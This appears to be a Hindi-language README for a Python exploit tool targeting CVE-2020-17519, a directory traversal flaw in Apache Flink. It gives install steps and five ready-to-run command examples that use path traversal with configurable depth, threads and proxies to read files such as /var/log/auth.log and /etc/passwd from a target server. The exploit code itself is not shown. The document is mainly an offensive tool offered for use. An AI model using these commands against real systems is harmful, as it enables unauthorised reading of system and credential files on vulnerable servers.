
CVE-2020-17519 (Apache Flink) के लिए Python-आधारित डायरेक्टरी ट्रावर्सल एक्सप्लॉइट, जिसमें मल्टी-थ्रेडिंग, प्रॉक्सी सपोर्ट, और असुरक्षित लक्ष्यों से लॉग फ़ाइलें प्राप्त करने के लिए कॉन्फ़िगरेबल डेप्थ शामिल हैं।
एक Python उपकरण जो लक्ष्य URL से लॉग फ़ाइलों का अनुरोध करने के लिए डायरेक्टरी ट्रैवर्सल तकनीक का उपयोग करता है। यह रीयल-टाइम प्रगति प्रदर्शित करता है, प्रॉक्सी कॉन्फ़िगरेशन का समर्थन करता है, और वैध प्रतिक्रियाओं को वैकल्पिक रूप से सहेजता है।
requests और pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
इस उपकरण को विभिन्न विकल्पों के साथ कमांड लाइन से निष्पादित किया जा सकता है। नीचे कुछ उदाहरण दिए गए हैं:
उदाहरण 1: एकल फ़ाइल पथ का अनुरोध करें
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
उदाहरण 2: किसी सूची से अनेक फ़ाइल पथों का अनुरोध करें
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
उदाहरण 3: प्रॉक्सी अक्षम करके चलाएँ
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
उदाहरण 4: फ़ाइल सूची का उपयोग करें और वैध प्रतिक्रियाएँ सहेजें
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
उदाहरण 5: बढ़ी हुई गहराई के साथ एकल फ़ाइल का अनुरोध करें
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
अधिक जानकारी के लिए, स्रोत कोड और इनलाइन टिप्पणियाँ देखें।